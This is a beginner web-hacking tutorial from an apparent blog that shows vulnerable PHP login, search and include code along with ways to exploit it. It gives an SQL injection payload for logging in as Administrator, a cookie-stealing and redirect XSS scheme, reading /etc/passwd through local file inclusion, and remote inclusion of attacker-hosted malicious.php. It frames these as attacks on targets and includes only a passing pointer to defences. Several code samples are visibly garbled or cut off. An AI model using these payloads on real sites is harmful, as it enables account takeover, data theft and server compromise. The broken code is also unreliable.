Basic Website Hacking Tutorial for beginners

Note: I believe you have some basic knowledge of HTML and PHP 🙂
Intended for educational purpose only…

hacked

SQL Injection

SQL injection is the act of injection your own, custom-crafted SQL commands into a

web-script so that you can manipulate the database any way you want. Some example usages of

SQL injection: Bypass login verification, add new admin account, lift passwords, lift

credit-card details, etc.; you can access anything that’s in the database.

Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code
PHP Code:

php
$user = $_POST[‘u’];
$pass = $_POST[‘p’];

if (!isset($user) || !isset($pass)) {
echo(“

“);
} else {
$sql = “SELECT `IP` FROM `users` WHERE `username`=’$user’ AND `password`=’$pass’”;
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != “”) {
echo(“Welcome, $user.”);
} else {
echo(“Incorrect login details.”);
}
}
?>

Basically what this code does, is take the username and password input, and takes the

users’s IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw an “‘” into the inputs, and see if it outputs an error; if so, it’s probably

injectable. If it doesn’t display anything, it might be injectable, and if it is, you will

be dealing with blind SQL injection which anyone can tell you is no fun. Else, it’s not

injectable.

The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into his account. Since

the code doesn’t filter our input, we can insert anything we want into the statement, and

just let ourselves in. To do this, we would simply put “Administrator” in the username box,

and “‘ OR 1=1–” into the password box; the resulting SQL query to be run against the

database would be “SELECT `IP` FROM `users` WHERE `username`=’Administrator’ AND

`password=” OR 1=1–’”. Because of the “OR 1=1″, it will have the ability to ignore the

password requirement, because as we all know, the logic of “OR” only requires one question

to result in true for it to succeed, and since 1 always equals 1, it works; the “–” is the

‘comment out’ character for SQL which means it ignores everything after it, otherwise the

last “‘” would ruin the syntax, and just cause the query to fail.

XSS (Cross-Site Scripting)
This vulnerability allows for an attacker’s input to be sent to unsuspecting victims. The

primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie,

they can log into whatever site they stole your cookie from under your account (usually,

and assuming you were logged in at the time.)

Example Vulnerable Code – search.php (PHP)
PHP Code:

php
$s = $_GET[‘search’];
// a real search engine would do some database stuff here
echo(“You searched for $s. There were no results found”);
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as “XSS”. If the site is vulnerable to XSS, you will see something like this:

XSS, else, it’s not vulnerable.

Example Exploit Code (Redirect)
Because we’re mean, we want to redirect the victim to goatse (don’t look that up if you

don’t know what it is) by tricking them into clicking on a link pointed to

“search.php?search=// “. This will output “You searched for // . There were no results

found” (HTML) and assuming the target’s browser supports JS (JavaScript) which all modern

browsers do unless the setting is turned off, it will redirect them to abc.

RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed

and executed on the local server.

Example Vulnerable Code – index.php (PHP)
PHP Code:

Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it is vulnerable to

RFI and consequently LFI. If you don’t it’s not vulnerable to RFI, but still may be

vulnerable to LFI. Assuming the server is running *nix, try viewing

“index.php?p=/etc/passwd”; if you see the passwd file, it’s vulnerable to LFI; else, it’s

not vulnerable to RFI or LFI.

Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our

server
PHP Code:
index.php”);
?>
and then we view “index.php?p=http://our.site.com/malicious.php” then our malicious code

will be run on their server, and by doing so, their site will simply say ‘Hacked’ now.
I already dropped a post on protection against Sql Injection. You can check it out HERE

Comments

comments